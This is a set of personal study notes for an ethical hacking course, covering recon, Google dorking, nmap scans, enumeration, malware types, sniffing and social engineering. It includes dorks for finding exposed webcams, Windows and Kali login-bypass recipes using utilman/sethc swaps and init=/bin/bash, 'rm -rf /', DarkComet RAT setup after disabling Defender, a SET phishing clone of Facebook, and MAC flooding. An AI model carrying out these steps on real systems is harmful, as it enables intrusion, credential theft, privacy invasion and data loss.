· 6 years ago · Jan 25, 2020, 12:04 PM
1Foot Printing/ Recon / info - gathering
2
3Foot printing: To learn as much as you can about a System or a Website ,it’s Functionality, Structure, services being used,
4and other aspects of its security.
5The process of accumulating data regarding a specific network environment for the purpose of revealing system vulnerabilities .
6
7
82 Types
9Active v Passive
10
11Passive Foot Printing: Measures to collect info from publicly accessible sources.
12Whatever information you will collect here is going to be available publicly out there in open. You just have to scrape it.
13
14
15Active Foot Printing: Requires attacker to interact with or touch device, network, or resource. usually social engineering or human interaction.
16It involves tasks that may be logged by the target's systems so being stealthy is key.
17
18Example :
19Reviewing a company’s website is an example of passive footprinting, whereas attempting to gain access to sensitive information through social engineering
20is an example of active information gathering.
21
22[[Social Eng. IMAGE]]
23
24what Types of Information are we looking for ?
25During Foot printing the types of information that hacker can gather is :
26Domain name
27IP Addresses
28Nameservers
29Employee information
30Phone numbers
31E-mails
32Job Information
33
34Why Footprint/Recon ?
35 To Understanding what is there to attack.
36 Allows to assess the posture of the target, security methods and applications in use.
37 This allows the attacker to focus on the most vulnerable part.
38From where can we gather all this information :
39 Social media,
40 google,
41 bing,
42 duckduckgo
43 baidu
44 company website,
45 competetive intel : - competitor website,
46 job portals
47 dorks--ghdb
48
49Tracking Employee’s online activity.
50
51Use multiple search engines because they rank pages differently, they index differently hence allowing you to see more information
52
53Home work: read about google page ranking algorithm
54
55
56Time invested upfront will save time later.
57Organise all the information that you have collected in written somewhere.
58
59Example : https://www.wsj.com/articles/fraudsters-use-ai-to-mimic-ceos-voice-in-unusual-cybercrime-case-11567157402
60
61search : - kevin mitnick and similiar hackers
62
63Let's Start Footprinting (Hands on)
64
65How to find ip address of a domain
66 ping www.google.com
67 Use this command in windows cmd prompt or linux and check for ip address in reply
68
69Performing a Domain Name Lookup
70 https://www.whois.com/whois
71
72Reverse Domain Lookup here you can find all the website hosted on a shared server. Search using ip address of webapp
73 https://viewdns.info/reverseip/
74 http://whois.domaintools.com
75 https://hostingchecker.com/tools/reverse-ip-lookup/
76 https://www.yougetsignal.com/tools/web-sites-on-web-server/
77
78To find out info. Such as hosting company, county,region, and isp
79 https://www.ip2location.com/
80
81To find out range of allotted ip address we can use(regional internet registry rir)
82 https://www.arin.net/
83
84
85For emails Harvesting
86
87theharvester -h
88-h is for help menu
89
90theharvester -d tcs.com -b google
91
92
93
94For Cloning and copying a website
95 https://www.httrack.com/ [available for kali and windows]
96 This allows to understand the structure of website locally
97 black widow website cloner
98 http://softbytelabs.com/wp/blackwidow/
99 https://sitepuller.com/
100 is a paid service
101 https://websitedownloader.io
102 again a piad service but can view preview
103
104We can also find out history of websites. How they looked way back in time
105 http://web.archive.org
106 We can see all the changes that has been made for past few years
107
108Google Dorking
109
110Google Dorks (these are advanced search options )
111 Intext:
112
113 Inurl:
114
115 Intitle:
116
117 Filetype:
118
119example:
120 finding open camera dorks
121 inurl:/view.shtml
122 http://camera.buffalotrace.com/view/view.shtml?id=55122&imagePath=/mjpg/video.mjpg&size=1
123 inurl:view/view.shtml
124 liveapplet
125 inurl:view/index.shtml
126 inurl:ViewerFrame?Mode=Refresh
127 inurl:ViewerFrame?Mode=
128https://www.insecam.org/en/bycountry/IN/
129This is to view insecure cams and can be narrowed by country choice
130
131Country Specific search
132Sometimes your order gives hundreds of URLs. You can restrict your search by adding a country, a specialized URL or another message:
133
Add: site:in and your search is restricted to in (India).
134Like: intitle:"live view" intitle:axis site:in
135
Other examples:
136
site:de (Restricted to de (Germany)
137
site:be (Restricted to be (Belgium)
138
site:com (Restricted to com (com)
139
site:net (Restricted to net (net)
140
and so on.
141
142Camera Specific Search:
143 Axis Cameras
144indexFrame.html axis
145
intitle:"Live View / - AXIS"
146
intitle:"Live View / - AXIS 206M"
147
intitle:"Live View / - AXIS 210"
148
149Canon Cameras
150 sample/LvAppl/
151MOBOTIX Cameras
152 control/userimage.html
153More info. and organised
154 http://johnbokma.com/mexit/2005/01/09/security-webcam-hunting.html
155More information and dorks can be found here :
156 http://members.upc.nl/a.horlings/doc-google.html
157
158Exploit DB walkthrough
159
160netcraft
161https://toolbar.netcraft.com/site_report
162
163CVE deatils Search
164
165
166Shodan.io
167 utility for IOT devices search / un protected
168https://www.youtube.com/watch?v=01dLzan9g0E
169
170Online People Searching resources
171 Some are better than others so try all:
172 Pipl.com
173 Retired free search as of June 12, 2019.
174 For fetching information regarding any individual person.
175 www.zabasearch.com
176 www.truepeoplesearch.com
177
178 http://whitepages.com/person
179 http://peoplesearchnow.com
180 http://anywho.com
181 www.intelius.com
182 http://spokeo.com
183 http://emailhunter.co --> hunter.io
184
185Social media sites like linkedin, twitter,facebook, instagram [[ mostly a user resuses same username for all ]]
186
187To grab User Agent IP address of Target
188 grabify
189 https://grabify.link/
190
191Browser Plugins on the go
192 *wappalyzer
193 https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/?src=search
194 *built with
195
196inside linux terminal
197 # whatweb domainname.com
198
199To know if they read your mail or not: Email Tracking
200
201Whoreadme
202Yesware
203Hubspot
204Bananatag
205Getnotify
206Readnotify
207Msgtag
208Didtheyreadit
209
210 https://chrome.google.com/webstore/detail/email-tracking-for-gmail/ndnaehgpjlnokgebbaldlmgkapkpjkkb?hl=en
211
212----------------------------------------------------------------------------------------------------
213linux timeline
214
2151. The Shell - Bash
216
217
218The shell, or the terminal is a really useful tool. Bash is the standard shell on most Linux distros.
219
220Navigating
221----------------------------------------------------------------------------------------------------
222pwd - Print working directory
223
224cd - Change directory
225
226cd ~ - Change directory to your home directory
227
228cd - Go back to previous directory
229Looking at files
230
231ls - List files in directory
232
233ls -la - show hidden files and details
234Shows all the files and directories and their permission settings.
235
236drwxrwxrwt 2 root root 4,0K ago 3 17:33 myfile
237Here we have 10 letters in the beginning. The first one d shows that it is a directory.
238The next three letters are for read, w for write and x for execute.
239The first three belong to the owner,
240the second three to the group,
241and the last three to all users.
242
243ls flags
244
245file - Show info about file. What type of file it is. If it is a binary or text file for example.
246
247cat - Output content of file.
248
249touch - Create a new file.
250
251cp - Copy
252
253mkdir - Make directory.
254
255# Make entire directory structure
256mkdir -p new/thisonetoo/and/this/one
257
258rm - Remove file
259
260# Remove recursively and its content. Very dangerous command!
261
262rm -rf ./directory
263Watch the command destroy an entire machine: https://www.youtube.com/watch?v=D4fzInlyYQo
264rm -rf /
265
266
267rmdir - Remove empty directory
268--------------------------------------------------------------
269There are mainly three ways to find files on Linux: locate, and which
270--------------------------------------------------------------------------------------------
271
272locate filename
273 needs internal db to run fast
274
275which filename
276 outputs the file path
277
278explainshell.com
279
280--------------------------------------------------------------------------------------------
281Scanning
282
283before port scanning we need to have knowledge of
284
285How Tcp three way handshake works
286handshake explained here
287[ref. 3 way handshake image]
288
289
290TCP flags
291SYN
292ACK
293RST
294URG
295FIN
296PSH
297[[ ec council tcp flags ]]
298
299[[ref. image wireshark capture image ]]
300
301
302
303Ping Sweep :
304
305Tools for scanning
306AngryIPscanner – Both available for Linux and windows
307
308NMAP – tool is used to identify the target server like OS, open ports, service, vulnerability of the individual server.
309
310
311Ping to check basic connectivity
312ping <iphere>
313^C to exit
314
315Ping sweep
316to check for active devices in a network
317sends a icmp echo reqst
318and waits for icmp reply
319tools :
320 angry ip scanner [[ ref. to image for tool utility ]] [[https://angryip.org/]]
321
322 advanced ip scanner [http://www.radmin.com]
323 visual ping tester -std. [ http://www.pingtester.net]
324 nmap ping sweep
325 -sP: tells nmap no to do a port scan after host discovery.
326 nmap -sP <192.168.0.1-255>
327 The flag -sn (No port scan) replaces the -sP you just tried
328
329
330Nmap Scanning
331
332nmap 192.123.12.1
333= nmap -sS
334[[by default tcp syn scan is run ]]
335
336scanning leads to three possible results
337port state
338 open [[when ack rcvd from target]]
339 closed [[when rst rcvd from target ]]
340 filtered [[when no response is rcvd from target ]]
341Filtered
342Nmap will attempt to resend the SYN-packet if no response is received. If after several retransmissions no response is received,
343the port is marked as filtered.
344
345TCP SYN Scan [[ nmap -sS 192.168.12.2]] or [[ nmap 192.168.12.3]]
346
347a.k.a half-open scanning, stealth scan
348
349SYN scan has long been called the stealth scan because it is subtler than TCP connect scan.
350because you don't open a full TCP connection
351The TCP SYN scan is the default scan that runs against the target machine. It is the fastest scan.
352You can tweak it to make it even faster by using the –n option, which would tell the nmap to skip
353the DNS resolution.
354
355
356◾◾ The source machine sends a SYN packet to port 80 in the destination machine.
357◾◾ If the machine responds with SYN/ACK packet, Nmap would know that the particular port is open on the target machine.
358◾◾ The operating system would send a RST (Reset) packet in order to close the connection, since we already know that the port is open.
359◾◾ However, if there is no response from the destination after sending the SYN packet, the nmap would know that the port is filtered.
360◾◾ If you send a SYN packet and the target machine sends a RST packet, then nmap would know that the port is closed.
361
362TCP Connect Scan [[full handshake]] [[ nmap -sT <ipaddrhere> ]]
363
364The TCP connect scan is similar to the SYN scan, with a slight difference in that it completes the three-way handshake.
365The TCP connect scan becomes the default scan if the SYN scan is not supported by the machine. A common reason for that could be that the machine is
366not privileged to create its own RAW packet.
367◾◾ The source machine sends a SYN packet at Port 80.
368◾◾ The destination machine responds with a SYN/ACK.
369◾◾ The source machine then sends an ACK packet to complete the three-way handshake.
370◾◾ The source machine finally sends the RST packet in order to close the connection.
371
372NULL, FIN, and XMAS Scans
373
374NULL, FIN, and xmas scans are similar to each other. The major advantage of using these scans
375for pentest is that many times they get past firewalls and IDS and can be really beneficial against
376
377Unix-based OS.
3782 dis-advantage
379
3801.)These scans do not work against Windows-based operating systems, because they send a reset packet regardless of whether the port is open or closed.
381why ? because windows does not follow rfc 793
3822.)It cannot be exactly determined if the port is open or filtered. This leaves us to manually verify it with other scan types.
383
384
385These scan exploit loophole in RFC 793
386Page 65 of RFC 793 says that “if the
387[destination] port state is CLOSED .... an incoming segment not containing a RST causes a RST to be sent in response.”
388Then the next page discusses packets sent to open ports without the SYN, RST, or ACK bits set, stating that: “you are unlikely to get here, but if you do, drop the segment, and return.”
389
390When scanning systems compliant with this RFC text, any packet not containing SYN, RST, or ACK bits will result in a returned RST if the port is closed and no response at all if the port is open. As long as none of those three bits are included, any combination of the other three (FIN, PSH, and URG) are OK.
391
392NULL Scan [[ nmap -sN <targetiphere> ]]
393
394A null scan is accomplished by sending no flags/bits inside the TCP header. If no response comes, it means that the port is open;
395if a RST packet is received, it means that the port is closed or filtered. [[ refer to image in cheatsheet]]
396
397FIN Scan [[ nmap -sF <targetiphere>]]
398
399A FIN flag is used to close a currently open session. In a FIN scan the sender sends a FIN flag
400to the target machine: if no response comes from the target machine, it means that the port is
401open; if the target machine responds with a RST, it means that the port is closed.
402[[refer to image ]]
403
404XMAS Scan [[ nmap -sX <targetiphere> ]]
405
406The XMAS scan sends a combination of FIN, URG, and PUSH flags to the destination.[technically this combination of bit's does not makes any sense to the reiever]
407It lightens the packet just like a Christmas tree and that is why it is called an XMAS scan. It works
408just like the FIN and null scans. If there is no response, the port is open; if the target machine
409responds with a RST packet, the port is closed.
410
411[[ refer to image ]]
412
413UDP Scan [[ nmap -sU <targetiphere> ]]
414
415TCP ACK Scan
416
417TCP ACK + Port 6969
418The TCP ACK scan is not used for port scanning purposes. It is commonly used to determine the firewall and ACL rules (access list) and whether the firewall
419is able to keep track of the connections that are being made.
420The way this works is that the source machine sends an acknowledge (ack) packet instead of a syn packet.
421If the firewall is stateful, it would know that the there was no SYN packet being sent and will not allow the packet to reach the destination.
422
423
424IDLE Scan
425a.k.a Zombie Scan
426The IDLE scan is a very effective and stealthy scanning technique. The idea behind the IDLE scan is to introduce a zombie to scan another host.
427This technique is stealthy because the victim host would receive packets from the zombie host and not the attacker host. In this way, the victim would not
428 be able to figure out where the scan originated.
429However, there are some prerequisites for launching the idle scan, which are as follows:
430
4311. Finding a good candidate whose IP ID sequence is incremental and recording its IP ID.
4322. The host should be IDLE on the network.
433
434
435NMAP Timing Technique
436
437The timing technique is one of the best techniques to evade firewalls/IDS. The idea behind this
438technique is to send the packets gradually, so they do not end up being detected by firewalls/IDS.
439In nmap we can launch a timing scan by specifying the T command followed by a number ranging
440from 0 to 5. Increasing the values from T0 to T5 would increase the speed of the scan.
441[[refer to NMAP sans cheatsheet ]]
442t --> threads
443◾◾ T0—Paranoid
444◾◾ T1—Sneaky
445◾◾ T2—Polite
446◾◾ T3—Normal
447◾◾ T4—Aggressive
448◾◾ T5—Insane
449
450
451nmap.org --> nmap guide
452
453ZENMAP [[ automated and GUI version of nmap]]
454
455route -n [[to check your gateway]] [[linux]]
456
457# netstat -an
458 -To check open ports in your server
459
460# netstat -ona
461 –list off ports and PID (process ID)
462Through Task manager to terminate any PID regarding port for unnecessary connection establishing.
463
464
465ENUMERATION
466Enumeration :
467>querying a system to gather info . such as unames , shares , block of ip , services , routing tables, banners ,dns etc.
468> analysing the system to determine attack vectors
469>need to identify system attack points
470>we create active connection with the target
471
472scan with nmap --> check for open port→ and then enum
473
474◾◾ T0—Paranoid
475◾◾ T1—Sneaky
476◾◾ T2—Polite
477◾◾ T3—Normal
478◾◾ T4—Aggressive
479◾◾ T5—Insane
480
481
482
483Banner Grabbing
484 method of identifying the host or service to determining application s/w or version number.
485 ways:
486 nmap
487 nmap -sV --script=banner <$ip>
488 nmap -sV -Pn -p 80 --script=banner <ip>
489
490 telnet <$ip> <$port>
491 is going to ouput the version of the service
492
493 telnet <hostname- abcd.com> <port80>
494
495 nc -v <$ip> <$port>
496
497dirb - directory bruteforcing
498dirb http://192.168.21.21:8080/
499by default uses default wordlist i.r common .txt
500dirb http://ip:port/ <$custom wordlistpath>
501
502NMAP os fingerprinting
503 -O osfingerprinting
504nmap -O <$ip>
505nmap -A <$ip>
506This option enables OS and version detection, script scanning, and a traceroute thus supplying you with extended enumeration on the target
507
508Using Nmap for enumeration
509
510#nmap --script smb-os-discovery --open -p 139 $IP
511script usage using *os*
512
513some ports and protocols to know for enum.
514Ports
51553 tcp/udp DNS
516135 tcp/udp RPC
517137 tcp/udp netbios
518139 tcp/udp netbios
519445 tcp/udp SMB
520
521
522nbtscan: demo on com80/ metasploitable
523nbtscan -r <$ip range /24>
524
525>NBTScan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts).
526>It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form.
527
528Netdiscover - pre isntalled in kali
529netdiscover --help
530-i network interface eth0, wlan0, wlan1 [[ ifconfig and check for interface ]]
531-r range of ip for your network
532-l to give list of ip from a file
533-p passive mode - not send anything only sniff
534
535netdiscover -i eth0 -r <$iprange/24>
536Netdiscover is a network address discovering tool.
537How does it works ?--> Its based on arp packets, it will send arp requests and sniff for replys.
538discovering devices connected to our network (we can do same with nmap as well)
539
540SMB - what is SMB
541The Server Message Block Protocol (SMB protocol) is a client-server communication protocol used for sharing access to files, printers, serial ports
542and other resources on a network. It can also carry transaction protocols for interprocess communication.
543Port : 445
544
545[ smb versions and their corresponding os ]
546
547o SMB1 – Windows 2000, XP and Windows 2003.
548o SMB2 – Windows Vista SP1 and Windows 2008
549o SMB2.1 – Windows 7 and Windows 2008 R2
550o SMB3 – Windows 8 and Windows 2012.
551
552smbmap :
553SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality,
554 file name auto-download pattern matching, and even execute remote commands. This tool was designed with pen testing in mind and is intended to simplify searching for
555potentially sensitive data across large networks.
556smbmap -H <$ip>
557smbmap -H <$ip> -d metasploitable -u <$uname msfadmin> -p <$paswrd msfadmin>
558
559Smbclient
560smbclient is a client that can ‘talk’ to an SMB/CIFS server. It offers an interface similar to that of the FTP program.
561Operations include things like getting files from the server to the local machine, putting files from the local machine to the server, retrieving directory information from the server and so on.
562
563smbclient -L 192.168.1.102
564> get a list of sharenames
565smbclient //192.168.1.102/tmp
566 ^sharename
567ls
568get filename.txt
569
570
571netstat -antup
572-a display all socket connection
573-n numeric
574-t for tcp port
575-u fort udp
576p- process
577
578
579SYSTEM HACKING
580
581
582
583
584
585
586
587SAM file : security account manager
588is a DB that stores credentials and other account parameters such as passwd in hashed form .
589
590file is located in :
591c:\windows\system32\config\sam
592
593Linux --> shadow file
594
595/etc/shadow
596
597
598windows 10 login bypass
599--> osk.exe
600
601--> utilman.exe
602
603--> sethc.exe
604
605Windows 7 OS login bypass
606---------------------------------------
607current paaswd 1234
608switch on the system , shutdown abruptly
609switch it on again --> select recovery method --> restore pop will appear click cancel --> wait for new startuprepair pop up
610--> click on down arrow popup--> scroll down select view offline report --> notepad will open --> click file --> open -->select filetype any-->
611browse to c/windows/system32/
612look for file named utilman and rename it to utilman1
613now search for cmd executable and rename it to utilman
614cancel eveyrthing and exit everything --> let the windows reboot --> once the login screen comes --> tap on bottom left utility icon -->
615cmd will pop up --> type following cmd to change passwd
616whoami
617net user [[ this is going to list all the users on the device ]]
618net user "a/c name" *
619press enter and then enter passwd here
620
621
622
623wind 10 OS login bypass current passwd 123456789
624-------------------------------------------------------------
625abruptly switch off wind 2-3 times until repair options appear while booting
626
627poweron -->abrupt poweroff
628again power on --> again poweroff
629
630again power on [ now you will see diagnosing problem/repairing ]
631
632let it boot
633
634select advance option --> troubleshoot-->advance options --> system image recovery--> cancel--> next -->advcd--> install a driver --> ok-->
635
636navigate to my computer first
637navigate to C:/windows/system32/
638look for file named utilman or sethc (both are going to work fine )and rename it to utilman1/sethc1
639now search for cmd executable and rename it to utilman
640cancel eveyrthing and exit everything -->reboot
641
642 once the login screen comes --> tap on bottom right utility icon (ease of access icon)-->
643cmd will pop up --> type following cmd to change passwd
644whoami
645net user [[ this is going to list all the users on the device ]]
646net user "a/c name" *
647press enter and then enter passwd here
648-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
649
650kali linux os login bypass
651cureent password 123456
652
653power on machine -->advance linux gnu options-->
654
655-->kali gnu/linux, with linux 4.19.0 kaliamd64 (recovery mode) [don't press enter ]
656
657-->press e while selecting above --> scroll down using arrow and look for line starting with linux
658
659-->replace ro with rw
660
661-->and also add
662-->in the end of same line
663
664init=/bin/bash
665
666-->press f10
667-->whoami
668-->passwd root
669-->enter newpswd
670-->reboot -f
671
672----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
673stickykeys replacement
674browse to windows system32\sethc
675rename this to sethc1
676cmd
677copy and paste cmd here only
678refresh
679rename copy cmd to
680sethc
681that's it
682cancel everything
683and restart the machine
684once booted
685press sticky key
6865x shift
687cmd will open
688control userpasswords2
689select admin
690click reset passwrd
691set passwd
692-----------------
693
694
695MALWARE THREAT
696Malware
697what is ?
698mal + ware = malicious software
699
700designed to infiltirate and damage computers without the user consent.
701the term malware encompasses all the diff. types of threats to your computer such as :
702viruses, spywares , worms ,trojans etc.
703
704Purpose of Malware !!
705why do we need malware ? why were they created at first place ?
706> to do things without user's permission
707> to Steal files
708> to steal stored passwords
709> to hijack into computer
710> to hijack core computing functions
711> to monitor the activity of the user
712> to delete sensitive personal data
713> to encrypt sensitive data
714> to extort money
715
716Types of Malwares :
717
7181. Virus: vital info resource under sieze
719 disrupts the normal functionality of computer
720
721 they are genearlly masked with executable files (i.e attached to exe files)
722 the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious program.
723 Normally, the host program keeps functioning after it is infected by the virus.
724 although they can not replicate themselves outside the network . but has the ability to replicate and attach itself to other files locally
725 Viruses spread when the software or document they are attached to is transferred from one computer to another using the network,
726 a disk, file sharing, or infected email attachments.
727
7282. Worm:
729similar to viruses , replicate itself outside the n/w as well
730self replicating without host program and spreads without any human interaction or directives from the malware authors.
731worms are standalone software and do not require a host program or human help to propagate
732A worm enters a computer through a vulnerability in the system and takes advantage of
733file-transport or information-transport features on the system, allowing it to travel unaided
734
7353. Trojan
736malicious s/w represents as valid
737> A Trojan is another type of malware named after the wooden horse that the Greeks used to infiltrate Troy.
738> It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems.
739> After it is activated, it can achieve any number of attacks on the host, from irritating the user (popping up windows or changing desktops)
740 to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses).
741> Trojans are also known to create backdoors to give malicious users access to the system.
742> Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate.
743> Trojans must spread through user interaction such as opening an email attachment or downloading and running a file from the Internet.
744
7454. Spyware
746Software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent,
747 or that asserts control over a device without the consumer's knowledge.
748
7495. Ransomware
750kind of malware that is used to extort money by infecting the user.
751it encrypt all the files on a user's system using a strong encryption algoritham. Then demands for ranson to issue a decrypting key to retrieve / decrypt the user data .
752
7536. Rootkit
754Programs that hide the existence of malware by intercepting (i.e., "Hooking") and modifying operating system API calls that supply system information.
755Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower to include a hypervisor, master boot record, or the system firmware.
756 Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components.
757 Rootkits have been seen for Windows, Linux, and Mac OS X systems.
758
7597. keyloggers
760special kind of Spyware
761The action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored.
762Data can then be retrieved by the person operating the logging program. A keylogger can be either software or hardware
763-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
764
765What are shells?
766Shell can simply be described as a piece of code or program which can be used to gain code or command execution on a device (like servers, mobile phones, etc.).
767
768Types of shells
7691. Reverse shell
7702. Bind shell
771
772Reverse shell
773A reverse shell is a type of shell in which the target machine communicates back to the attacking machine. The attacking machine has a listener port on which it receives the connection, which by using, code or command execution is achieved.
774
775Figure 1: Reverse TCP shell
776
777
778Bind shell
779Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection.
780The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.
781
782Figure 2: Bind TCP shell
783There are a number of popular shell files. To name a few: Reverse TCP Meterpreter, C99 PHP web shell, JSP web shell, Netcat, etc.
784 One thing which is common between all these shells is that they all communicate over a TCP protocol.
785-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
786
787Creating Malware
788RAT: Remote Administration tool
789Dark Comet Example
790
791
792
793
794
795---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
796disable windows defender
797open dark comet
798server module (create server) --> full editor
799process mutex --> threads
800n/w setting --> enter lhost lport here --> press add
801this will open a socket in attacker machine to listen for incoming connection
802listen for connection
803
804SNIFFING
805
806sniffing aka wiretapping
807
808action of secretly listening to other people conversation , extending the definition to computers and n/w
809
810Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools
811
812sniffing can be done through h/w , s/w
813
814h/w when sniffing very high speed n/w eg. 10Gbps
815
816kinds of info we can gather through sniffing
817*usernames
818*passwords
819*Replay
820*Chat
821*watch some one surf website
822*ftp/telnet
823
824
825attack types
826passive sniffing
827
828hub : n/w device that shares broadcast domain
829
830tap: h/w it sits inline with commu. media replicates bits on the wire
831hosts . are not aware of this
832
833[ref hub image ]
834
835
836active sniffing
837in lay 2 n/w
838[ref switch image ]
839
840swithced n/w : bydefault you can not recieve the data in switching
841
842manipulate the switch to get a copy
843
844attacker poisons protocols to redirect traffic
845attacks that you can do against swithed n/w
846
847MITM techniques
848{{
849
850*MAC flood
851*MAC duplication
852*ARP spoof
853*DHCP starvation
854
855}}
856
857Promiscous mode tells NIC to not discard frames
858by default when NIC rcvs a layer 2 frame it reads des. mac add , if dest . mac is not as of yours the frame is discarded
859
860
861Protocols that provide usernames and passwords in cleartext
862
863Telnet
864POP
865SMTP
866FTP
867HTTP
868IMAP
869
870Hence Encryption is important
871
872MAC Flooding
873editing CAM table : mapping of mac address to physical ports
874
875CAM tables are finite : often 64k to 128k entries
876what happens when table is full : flooding occurs
877send 130k arp rqst and randomise source mac address [ cam table will be flooded ]
878once flooded switch will start broadcasting
879
880# macof -n 130000 -d 192.168.0.1
881-n for number of packets to send
882-d for switch ip address that you want to flood
883-e for target mac address
884
885
886MAC Spoofing
887impersonating other user
888technitium MAC address changer for windows used to modify MAC address of NIC
889https://technitium.com/tmac/
890
891How Does It Work?
892
893This software just writes a value into the windows registry.
894 When the Network Adapter Device is enabled, windows searches for the registry value 'NetworkAddress' in the key
895HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1- 08002bE10318}\[ID of NIC e.g. 0001].
896 If a value is present, windows will use it as MAC address, if not, windows will use the hard coded manufacturer provided MAC address. Some Network Adapter drivers have this facility built-in.
897 It can be found in the Advance settings tab in the Network Adapter's Device properties in Windows Device Manager.
898
899
900arp spoofing and arp cache poisoning [[ arp spoofing image]]
901arp explained
902ip to mac
903poison the gateway and victim both
904arp attack tool ettercap
905countermeasures: Xarp
906
907alice arp cahce :
908ip | mac
90910.0.0.1 | cc:Cc:cc:Cc:Cc...
910
911
912bob arp cahce :
913ip | mac
91410.0.0.7 | cc:cc:cc:cc:cc
915
916
917ARP : address resolution protocol
918example arp table arp <-'
919arp spoofing : image example
920
921simply broken for explanation :
922{{
923 3 machines rqrd
924 1,2,3
925 1→ windows
926 3→ ubuntu
927 2 → attacker
928 2 will tell 1 that i am 3 [ send me all the traffic destined for 3 ]
929 2 will tell 3 that i am 1 [ send me all the traffic destined for 1 ]
930 }}
931
932
933Sniffing Tools
934
935wireshark - GUI
936tcp dump - CLI
937-----------------------------------------------------------------------------
938Wireshark
939Wireshark is a free application that allows you to capture and view the data traveling back and forth on your network, providing the ability to drill down and read the contents of each packet – filtered to meet your specific needs.
940
941This open-source protocol analyzer.
942
943Originally known as Ethereal, Wireshark features a user-friendly interface that can display data from hundreds of different protocols on all major network types.
944
945-----------------------------------------------------------------------------
946
947Download : https://www.wireshark.org/download.html
948
949#wireshark
950capture --> select interface --> eth0
951click on sharkfin button on top toolbar to start capturing
952
953Packet List :
954==============
955
956Time: The timestamp of when the packet was captured is displayed in this column.
957
958Source: This column contains the address (IP or other) where the packet originated.
959
960Destination: This column contains the address that the packet is being sent to.
961
962Protocol: The packet's protocol name (i.e., TCP) can be found in this column.
963
964Length: The packet length, in bytes, is displayed in this column.
965
966Info: Additional details about the packet are presented here. The contents of this column can vary greatly depending on packet contents.
967
968---------------------
969Filters:
970========
971 || means Or --> any one true
972 && and → both true
973Filtering on the basis of IP
974
975= ip.addr == IPADDRESS
976
977For Filtering particular "source"
9781. ip.src == 192.168.43.43
979
980For Filtering particular "protocol"
9812. dns
982
983Using multiple Filters
9843. dns && ip.src == 192.168.43.1
985
986Filtering particular Destination
9874. ip.dst == 192.168.43.43
988
989Filtering Multiple Sources (Both Condition should be True)
9905. ip.src == 192.168.43.43 && ip.src == 192.168.43.1
991
992Filtering Multiple Sources (Any Condition should be True)
9936. ip.src == 192.168.43.43 || ip.src == 192.168.43.1
994
995Either this address in source or destination
9967. ip.addr == 192.168.43.43
997
998Not Condition (Dont want to view this source)
9998. !(ip.src == 192.168.43.43)
1000
1001Mutiple filters and both should be true as this is having &&
10029. ip.src == 192.168.43.43 && !(ip.dst == 192.168.43.1)
1003
1004For filtering packets on basis of data it contains
100510. tcp contains demo.testfire.net
1006
1007
1008
1009SOCIAL ENGI
1010
1011
1012Social Engineering
1013
1014it is all about psychological manipulation of a person.
1015
1016sometimes : gather info --> establish relation --> exploit that relation
1017
1018Targets : everyone
1019in business env.
1020--> small org. cause they don't have security policies in place , single people handling multiple
1021--> govt. org.
1022--> executives
1023
1024private individuals : elderly, in-experienced users , young user, lower income individuals.
1025
1026can be computer based / human based attacks
1027phishing: sending fake emails
1028[[ref image ]]
1029
1030pharming :- setting up fake similiar looking website /webpage
1031A web page created to deceive visitors into believing that is another company's web page.
1032For example, a user may create a web page that appears to be for a specific bank, requesting a username and password for login.
1033
1034whaling : catching the big fish - c-suite people
1035 directly target senior or other important individuals at an organization, with the aim of stealing money or sensitive information or gaining access to their computer systems for criminal purposes
1036[ref image ]
1037
1038snapchat example :
10392. Snapchat hands over payroll information
1040
1041Snapchat is no stranger to cyberattacks, but in 2016 the social media platform yet again found itself at the center of a data breach when an employee was tricked into releasing payroll information
1042 about some of its employees. In the attack, a member of the payroll team received an email from someone claiming to be Snapchat CEO Evan Spiegel,
1043who made a request for employee payroll information. The data was duly handed over to the attacker and the information was leaked shortly after.
1044
1045news link : https://www.theguardian.com/technology/2016/feb/29/snapchat-leaks-employee-data-ceo-scam-email
1046
1047vishing : making a fake phone call
1048
1049example : https://www.youtube.com/watch?v=BEHl2lAuWCk
1050
1051humans based attacks :
1052impersonation , tailgating ,dumpster diving, shoulder surfing,
1053
1054tailgating : https://www.youtube.com/watch?v=Mr1nT0_n_FM
1055[[ref.dumpster diving image ]]
1056
1057Pentesting Social Engineering:
1058Define scope of testing --> develop plan --> obtain permission from sr. mgmt -->
1059can use attachments in emails / phishsing emails/ tailgaiting / dumpster diving
1060
1061
1062
1063Pharming/phishing example through SET
1064
1065
1066
1067SET
1068-------------
1069delivery of url is not covered in this demo
1070#setoolkit
1071>1 for social en atks
1072>2 for website attack vectors
1073>3 for creds harvester method
1074>2 for site cloner [ will go out and copy and clone the website as it is ]
1075it asks for ip add for
1076where you want stolen cred to go to /sent to ..here you have to enter attackers ip(public/pvt)/ by default it shows you your kali ip address .. you can confirm it with ifconfig
1077enter url to clone : https://facebook.com
1078
1079wait
1080enter your attacker ip in victim browser
1081and enter creds
1082
1083and it redirects to real facebook page
1084
1085
1086[port forward/ngrok/ noip for wan ]
1087
1088
1089DOS_DDOS
1090
1091
1092DOS : Denial of service
1093what ?
1094 purposefull attack on n/w or a resource to prevent legitimate access.
1095creating congestion on a link
1096flooding with bogus requests.
1097system / link / server being overloaded with requests --> resulting in server getting overwhelmed
1098resulting in denial of service to legitimate traffic
1099a person with malicious intent would send a specifically crafted command to the application designed to make it crash, effectively resulting in a Denial of Service.
